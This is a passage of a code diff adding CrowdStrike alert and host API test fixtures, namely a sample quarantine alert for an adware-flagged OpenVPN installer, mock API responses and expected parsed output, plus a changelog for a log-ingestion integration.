"sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type":"module" + } + ], + "ioc_values":[], + "is_synthetic_quarantine_disposition":true, + "local_process_id":"17076", + "logon_domain":"ABSYS", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "name":"PrewittPupAdwareSensorDetect-Lowest", + "objective":"FalconDetectionMethod", + "parent_details":{ + "cmdline":"C:\\WINDOWS\\Explorer.EXE", + "filename":"explorer.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id":"1040", + "md5":"8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id":"392736520876", + "sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp":"2023-11-03T18:00:32Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + }, + "parent_process_id":"392736520876", + "pattern_disposition":2176, + "pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details":{ + "blocking_unsupported_or_disabled":false, + "bootup_safeguard_enabled":false, + "critical_process_disabled":false, + "detect":false, + "fs_operation_blocked":false, + "handle_operation_downgraded":false, + "inddet_mask":false, + "indicator":false, + "kill_action_failed":false, + "kill_parent":false, + "kill_process":false, + "kill_subprocess":false, + "operation_blocked":false, + "policy_disabled":false, + "process_blocked":true, + "quarantine_file":true, + "quarantine_machine":false, + "registry_operation_blocked":false, + "rooting":false, + "sensor_only":false, + "suspend_parent":false, + "suspend_process":false + }, + "pattern_id":5761, + "platform":"Windows", + "poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time":"1699034421", + "process_id":"399748687993", + "process_start_time":"1699034413", + "product":"epp", + "quarantined_files":[ + { + "filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state":"quarantined" + } + ], + "scenario":"NGAV", + "severity":30, + "sha1":"0000000000000000000000000000000000000000", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui":true, + "source_products":[ + "FalconInsight" + ], + "source_vendors":[ + "CrowdStrike" + ], + "status":"new", + "tactic":"MachineLearning", + "tactic_id":"CSTA0004", + "technique":"Adware/PUP", + "technique_id":"CST0000", + "timestamp":"2023-11-04T18:00:22.328Z", + "tree_id":"1931778", + "tree_root":"38697993", + "triggering_process_graph_id":"pid:2ce4114ad4adc8c1c54dbfec4b:399748687993", + "type":"ldt", + "updated_timestamp":"2023-11-04T19:00:23.985007341Z", + "user_id":"S-1-5-21-19999377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + } + ] + } diff --git a/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml b/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml new file mode 100644 index 00000000000..181f20c1e5f --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/files/config-host.yml @@ -0,0 +1,284 @@ +rules: + - path: /oauth2/token + methods: ['POST'] + responses: + - status_code: 200 + headers: + Content-Type: + - 'application/json' + body: | + {"access_token":"xxxx","expires_in":3600,"token_type":"Bearer","refresh_token":"yyyy"} + - path: /devices/queries/devices/v1 + methods: ['GET'] + query_params: + offset: 0 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":0,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"a21557a2-abd0-4363-9293-727c38084b3b"},"resources":["abc"]} + - path: /devices/queries/devices/v1 + methods: ['GET'] + query_params: + offset: 1 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":1,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"b21557a2-abd0-4363-9293-727c384b3b"},"resources":["def"]} + - path: /devices/entities/devices/v2 + methods: ['POST'] + request_body: /.*"abc"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_load_flags":"0", + "agent_local_time":"2023-11-07T04:51:16.678Z", + "agent_version":"7.05.17603.0", + "bios_manufacturer":"ABCInc.", + "bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)", + "chassis_type":"9", + "chassis_type_desc":"Laptop", + "cid":"92012896127c4948236ba7601b886b0", + "config_id_base":"6594763", + "config_id_build":"1703", + "config_id_platform":"4", + "connection_ip":"81.2.69.192", + "cpu_signature":"460517", + "device_id":"3114433dbce478ca48d9a828b9b34be", + "device_policies":{ + "device_control":{ + "applied":true, + "applied_date":"2023-06-20T08:45:26.341093915Z", + "assigned_date":"2023-06-20T08:43:47.736146738Z", + "policy_id":"2f88daf0177f467dae69262a5ce71775", + "policy_type":"device-control" + }, + "firewall":{ + "applied":true, + "applied_date":"2023-09-11T10:33:44.174488832Z", + "assigned_date":"2023-09-11T10:32:47.853976945Z", + "policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3", + "policy_type":"firewall", + "rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config":{ + "applied":true, + "applied_date":"2023-11-07T04:52:59.515775409Z", + "assigned_date":"2023-11-07T04:51:18.94671252Z", + "policy_id":"7e3078b60976486cac5dc998808d9135", + "policy_type":"globalconfig", + "settings_hash":"f01def74" + }, + "prevention":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + }, + "remote_response":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.01735027Z", + "assigned_date":"2023-06-08T10:03:49.505163572Z", + "policy_id":"dabb4def99034f11b9b3d52271584c9f", + "policy_type":"remote-response", + "settings_hash":"8a548e5e" + }, + "sensor_update":{ + "applied":true, + "applied_date":"2023-11-07T04:52:59.659583066Z", + "assigned_date":"2023-11-07T04:47:43.342175341Z", + "policy_id":"64bfa2bbcd4e46da92a66b107933da11", + "policy_type":"sensor-update", + "settings_hash":"tagged|18;101", + "uninstall_protection":"ENABLED" + } + }, + "external_ip":"81.2.69.192", + "first_seen":"2023-06-08T10:00:19Z", + "group_hash":"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups":[ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname":"CLM101-131.local", + "kernel_version":"22.6.0", + "last_seen":"2023-11-07T10:25:24Z", + "local_ip":"81.2.69.142", + "mac_address":"14-7d-da-ad-ac-71", + "machine_domain":"SYS", + "major_version":"22", + "meta":{ + "version":"6002", + "version_string":"7:43570272778" + }, + "minor_version":"6", + "modified_timestamp":"2023-11-07T10:26:53Z", + "os_build":"22G120", + "os_version":"Ventura(13)", + "platform_id":"1", + "platform_name":"Mac", + "policies":[ + { + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + } + ], + "product_type_desc":"Workstation", + "provision_status":"Provisioned", + "reduced_functionality_mode":"no", + "serial_number":"FVFDH73HMNHX", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"ABCInc.", + "system_product_name":"Air,1", + "tags":[ + "tags" + ] + } + ] + } + - path: /devices/entities/devices/v2 + methods: ['POST'] + request_body: /.*"def"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_load_flags":"0", + "agent_local_time":"2023-11-07T04:51:16.678Z", + "agent_version":"7.05.17603.0", + "bios_manufacturer":"ABCInc.", + "bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)", + "chassis_type":"9", + "chassis_type_desc":"Laptop", + "cid":"92012896127c4948236ba7601b886b0", + "config_id_base":"6594763", + "config_id_build":"1703", + "config_id_platform":"4", + "connection_ip":"81.2.69.192", + "cpu_signature":"460517", + "device_id":"3114433dbce478ca48d9a828b9b34be", + "device_policies":{ + "device_control":{ + "applied":true, + "applied_date":"2023-06-20T08:45:26.341093915Z", + "assigned_date":"2023-06-20T08:43:47.736146738Z", + "policy_id":"3f88daf0177f467dae69262a5ce71775", + "policy_type":"device-control" + }, + "firewall":{ + "applied":true, + "applied_date":"2023-09-11T10:33:44.174488832Z", + "assigned_date":"2023-09-11T10:32:47.853976945Z", + "policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3", + "policy_type":"firewall", + "rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config":{ + "applied":true, + "applied_date":"2023-11-07T04:52:59.515775409Z", + "assigned_date":"2023-11-07T04:51:18.94671252Z", + "policy_id":"7e3078b60976486cac5dc998808d9135", + "policy_type":"globalconfig", + "settings_hash":"f01def74" + }, + "prevention":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + }, + "remote_response":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.01735027Z", + "assigned_date":"2023-06-08T10:03:49.505163572Z", + "policy_id":"dabb4def99034f11b9b3d52271584c9f", + "policy_type":"remote-response", + "settings_hash":"8a548e5e" + }, + "sensor_update":{ + "applied":true, + "applied_date":"2023-11-09T04:52:59.659583066Z", + "assigned_date":"2023-11-09T04:47:43.342175341Z", + "policy_id":"74bfa2bbcd4e46da92a66b107933da11", + "policy_type":"sensor-update", + "settings_hash":"tagged|18;101", + "uninstall_protection":"ENABLED" + } + }, + "external_ip":"81.2.69.192", + "first_seen":"2023-06-09T10:00:19Z", + "group_hash":"c607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups":[ + "882388a8dbea4c44b5e019cfd32c2695" + ], + "hostname":"CLM101-141.local", + "kernel_version":"22.6.0", + "last_seen":"2023-11-09T10:25:24Z", + "local_ip":"81.2.69.142", + "mac_address":"14-7d-da-ad-ac-71", + "machine_domain":"SYS", + "major_version":"22", + "meta":{ + "version":"6002", + "version_string":"7:43570272778" + }, + "minor_version":"6", + "modified_timestamp":"2023-11-09T10:26:53Z", + "os_build":"22G120", + "os_version":"Ventura(13)", + "platform_id":"1", + "platform_name":"Mac", + "policies":[ + { + "applied":true, + "applied_date":"2023-06-09T10:04:47.643357971Z", + "assigned_date":"2023-06-09T10:03:49.505180252Z", + "policy_id":"2024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"m7a54ca1" + } + ], + "product_type_desc":"Workstation", + "provision_status":"Provisioned", + "reduced_functionality_mode":"no", + "serial_number":"FVVDH73HMNHX", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"ABCInc.", + "system_product_name":"Air,1", + "tags":[ + "tags" + ] + } + ] + } diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml index 150a7f59b86..525898a80b0 100644 --- a/packages/crowdstrike/changelog.yml +++ b/packages/crowdstrike/changelog.yml @@ -1,4 +1,39 @@ # newer versions go on top +- version: "1.32.1" + changes: + - description: Fix cache option name in FDR data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9436 +- version: "1.32.0" + changes: + - description: Set sensitive value as secret in cel input. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 +- version: "1.31.0" + changes: + - description: Add support for Alert and Host API endpoints. + type: enhancement + link: https://github.com/elastic/integrations/pull/8790 +- version: "1.30.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "1.29.0" + changes: + - description: Expose FDR cache options for more flexibility + type: enhancement + link: https://github.com/elastic/integrations/pull/9063 +- version: "1.28.3" + changes: + - description: Fix drive letter parsing. + type: bugfix + link: https://github.com/elastic/integrations/pull/1 +- version: "1.28.2" + changes: + - description: Add missing type mapping for host fields. + type: bugfix + link: https://github.com/elastic/integrations/pull/9030 - version: "1.28.1" changes: - description: Changed owners diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log new file mode 100644 index 00000000000..aaa9e837412 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log @@ -0,0 +1 @@ +{"agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b","aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","alleged_filetype":"exe","cid":"92012896127c4a948236ba7601b886b0","cloud_indicator":"false","cmdline":"\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"","composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","confidence":10,"context_timestamp":"2023-11-03T18:00:31Z","control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778","crawl_edge_ids":{"Sensor":["KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N","KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!","N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr","N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'","N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N"]},"crawl_vertex_ids":{"Sensor":["aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600","mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135","pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993","quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425"]},"crawled_timestamp":"2023-11-03T19:00:23.985020992Z","created_timestamp":"2023-11-03T18:01:23.995794943Z","data_domains":["Endpoint"],"description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.","device":{"agent_load_flags":"0","agent_local_time":"2023-10-12T03:45:57.753Z","agent_version":"7.04.17605.0","bios_manufacturer":"ABC","bios_version":"F8CN42WW(V2.05)","cid":"92012896127c4a948236ba7601b886b0","config_id_base":"65994763","config_id_build":"17605","config_id_platform":"3","device_id":"2ce412d17b334ad4adc8c1c54dbfec4b","external_ip":"81.2.69.142","first_seen":"2023-04-07T09:36:36Z","groups":["18704e21288243b58e4c76266d38caaf"],"hostinfo":{"active_directory_dn_display":["WinComputers","WinComputers\\ABC"],"domain":"ABC.LOCAL"},"hostname":"ABC709-1175","last_seen":"2023-11-03T17:51:42Z","local_ip":"81.2.69.142","mac_address":"ab-21-48-61-05-b2","machine_domain":"ABC.LOCAL","major_version":"10","minor_version":"0","modified_timestamp":"2023-11-03T17:53:43Z","os_version":"Windows11","ou":["ABC","WinComputers"],"platform_id":"0","platform_name":"Windows","pod_labels":null,"product_type":"1","product_type_desc":"Workstation","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"LENOVO","system_product_name":"20VE"},"falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","grandparent_details":{"cmdline":"C:\\Windows\\system32\\userinit.exe","filename":"userinit.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe","local_process_id":"4328","md5":"b07f77fd3f9828b2c9d61f8a36609741","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135","process_id":"392734873135","sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","timestamp":"2023-10-30T16:49:19Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"yuvraj.mahajan"},"has_script_or_module_ioc":"true","id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","ioc_context":[{"ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","ioc_source":"library_load","ioc_type":"hash_sha256","ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","type":"module"}],"ioc_values":[],"is_synthetic_quarantine_disposition":true,"local_process_id":"17076","logon_domain":"ABSYS","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","name":"PrewittPupAdwareSensorDetect-Lowest","objective":"FalconDetectionMethod","parent_details":{"cmdline":"C:\\WINDOWS\\Explorer.EXE","filename":"explorer.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe","local_process_id":"1040","md5":"8cc3fcdd7d52d2d5221303c213e044ae","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","process_id":"392736520876","sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","timestamp":"2023-11-03T18:00:32Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"},"parent_process_id":"392736520876","pattern_disposition":2176,"pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.","pattern_disposition_details":{"blocking_unsupported_or_disabled":false,"bootup_safeguard_enabled":false,"critical_process_disabled":false,"detect":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"inddet_mask":false,"indicator":false,"kill_action_failed":false,"kill_parent":false,"kill_process":false,"kill_subprocess":false,"operation_blocked":false,"policy_disabled":false,"process_blocked":true,"quarantine_file":true,"quarantine_machine":false,"registry_operation_blocked":false,"rooting":false,"sensor_only":false,"suspend_parent":false,"suspend_process":false},"pattern_id":5761,"platform":"Windows","poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==","process_end_time":"1699034421","process_id":"399748687993","process_start_time":"1699034413","product":"epp","quarantined_files":[{"filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","state":"quarantined"}],"scenario":"NGAV","severity":30,"sha1":"0000000000000000000000000000000000000000","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","show_in_ui":true,"source_products":["FalconInsight"],"source_vendors":["CrowdStrike"],"status":"new","tactic":"MachineLearning","tactic_id":"CSTA0004","technique":"Adware/PUP","technique_id":"CST0000","timestamp":"2023-11-03T18:00:22.328Z","tree_id":"1931778","tree_root":"38687993","triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993","type":"ldt","updated_timestamp":"2023-11-03T19:00:23.985007341Z","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json new file mode 100644 index 00000000000..24c0bf45297 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json @@ -0,0 +1,315 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-03T18:00:22.328Z", + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + "WinComputers" + ], + "platform_id": "0", + "platform_name": "Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + "system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": 